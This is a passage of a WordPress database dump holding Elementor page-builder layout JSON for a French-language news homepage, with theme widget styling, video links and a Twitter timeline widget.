-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Guin\\u00e9e innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1474,502,'_elementor_version','0.4'),(1475,502,'_elementor_css','a:3:{s:4:\"time\";i:1508924072;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1477,503,'_elementor_edit_mode','builder');
INSERT INTO `wpfy_postmeta` VALUES (1478,503,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mo